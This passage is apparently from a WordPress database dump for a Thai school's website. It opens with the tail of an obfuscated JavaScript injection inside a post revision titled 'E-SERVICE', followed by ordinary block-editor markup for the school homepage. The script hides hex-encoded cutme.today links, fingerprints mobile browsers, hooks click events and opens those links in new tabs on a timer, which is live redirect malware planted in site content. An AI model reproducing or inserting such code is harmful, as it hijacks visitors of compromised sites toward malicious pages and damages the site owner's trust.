\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-08 21:12:40','2024-08-08 14:12:40','',459,'http://pakhaeng.ssk.in.th/?p=744',0,'revision','',0),
(745,1,'2024-08-08 21:12:43','2024-08-08 14:12:43','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a 